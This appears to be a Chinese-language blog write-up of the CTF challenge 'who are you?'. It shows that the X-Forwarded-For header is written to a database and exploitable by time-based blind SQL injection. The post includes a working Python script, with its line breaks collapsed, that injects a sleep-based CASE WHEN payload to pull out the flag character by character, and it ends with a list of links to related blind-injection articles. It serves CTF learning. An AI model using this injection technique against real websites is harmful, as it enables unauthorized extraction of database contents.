CTF实验吧-who are you?【基于sleep盲注脚本】
原题链接: http://ctf5.shiyanbar.com/web/wonderkun/index.php
首先打开链接看到显示your ip is : xxx
首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系
实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧没有任何关于flag的线索,bp看了一下,,,果然是想当然,一无所获,然后重新看了下题目意思
划重点:记录db中去
完美,这就告诉了我们一件事,即X-Forwarded-For对应值被先存入数据库,再取出来,而不是直接显示给我们看
盲注,没有什么其他的注入方式了,此时能想到的(作者的水平,哈哈哈)盲注了
盲注分三种常见形式:分别基于布尔值,报错,时间延迟
简单测试,sleep有延时反应,应该是时间盲注了
下面附上代码:
# -*-coding:utf-8-*-import requests
import timepayloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的flag = ""
print("Start")
for i in range(33):for payload in payloads:starttime = time.time()#记录当前时间url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"#题目urlheaders = {"Host": "ctf5.shiyanbar.com","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate","Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour","Connection": "keep-alive","X-FORWARDED-FOR":"127.0.0.1' and case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end and '1'='1"}#bp拿到header并对X-FORWARDED-FOR进行修改,后面语句大意为从flag中选择出flag,若首字母段为flag,payload变量拼接则sleep5秒,看不懂的可以学一下case when语句和like %语句res = requests.get(url, headers=headers)if time.time() - starttime > 5:starttime2 = time.time()res = requests.get(url, headers=headers)if time.time() - starttime > 5:flag += payloadprint('\n flag is:', flag, )breakelse:print('',)#没啥解释的了,就是不断试payload,找到就接到flag上去然后继续试下一个
print('\n[Finally] current flag is %s' % flag)关于flag,大家自己可以跑同原理跑一下数据库名,表名,表名有个叫flag,可以得到列名flag
CTF实验吧-who are you?【基于sleep盲注脚本】相关推荐
- mysql基于时间盲注_MYSQL基于时间的盲注详解
MYSQL基于时间的盲注 联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误 但是有时候网站关闭了错误回显或过滤了某些关键字,网页 ...
- ctf各种sql盲注脚本
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲注(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极 ...
- Access数据库基于时间盲注的实现[www.freebuf.com]
Microsoft Office Access是由微软发布的关系数据库管理系统.它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft ...
- 【Less-9】基于SQLI的SQL时间盲注
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! [实验目的] [实验环境] [实验原理] [实验步骤] 第一步 登录SQLI-Labs平台 第二步 登录Kali平台 ...
- mysql延迟注入br,实验3—SQL注入漏洞的攻击与防御(基于时间延迟的盲注)
1.实验名称 SQL报错注入 2.实验环境 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏览器插件HackBar 1.6.3.1 3.实验 ...
- SDUT 2142 数据结构实验之图论二:基于邻接表的广度优先搜索遍历
数据结构实验之图论二:基于邻接表的广度优先搜索遍历 Time Limit: 1000MS Memory Limit: 65536KB Submit Statistic Problem Descript ...
- ctf实验-rot13-加密解密(附flag)
ctf实验-rot13-加密解密 57R9S980RNOS49973S757PQO9S80Q36P(md5不解密),flag格式为flag{解密内容} 方法一:使用python解码 # author ...
- halcon可以用python吗_如何基于pythonnet调用halcon脚本
这篇文章主要介绍了如何基于pythonnet调用halcon脚本,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 最近的项目中遇到了使用python程 ...
- SQL注入——基于时间的盲注(九)
本章目的 普及延时盲注技术的运用场景及条件,熟悉length().Substr().ascii().sleep().if()等函数的用法,掌握基于时间的盲注基本流程.PS:面试问答不深问就回答延迟 基 ...
最新文章
- JavaのFile类基础操作之问题
- Git 学习(二)版本库创建
- automation服务器不能创建对象是什么意思_从运营商角度来考虑为什么NAT不能搭建服务器?...
- windows mobile5.0之“hello world”
- akka2.5_发布Akka Toolkit 2.3
- 中下游大学毕业如何在大城市和各种985大学生厮杀?
- ggplot2 | ggplot2作图语法入门
- hbase shell相关命令
- 若何在嵌入式Linux及下建造QPF字库
- ASCII码16进制对照表
- 和cc2500通信时总是读入0F
- crontab 问号_轻松搞定crontab和quartz表达式
- vuejs --- 子组件向父组件传值(子传父)
- KRC跨境商城系 拍卖系统 竞拍系统 商城系统 虚拟支付源码
- 基于Kubernetes构建企业容器云【入门实战篇】- 手动制作CA证书(二)
- 代码托管和服务功能多元化,看码客帮如何做软件众包
- linux如何设置串口参数,串口通信的参数如何设置
- uniapp和vue的区别
- Python爬虫伪装,请求头User-Agent池,和代理IP池搭建使用
- Python 自动化提取基因的 CDS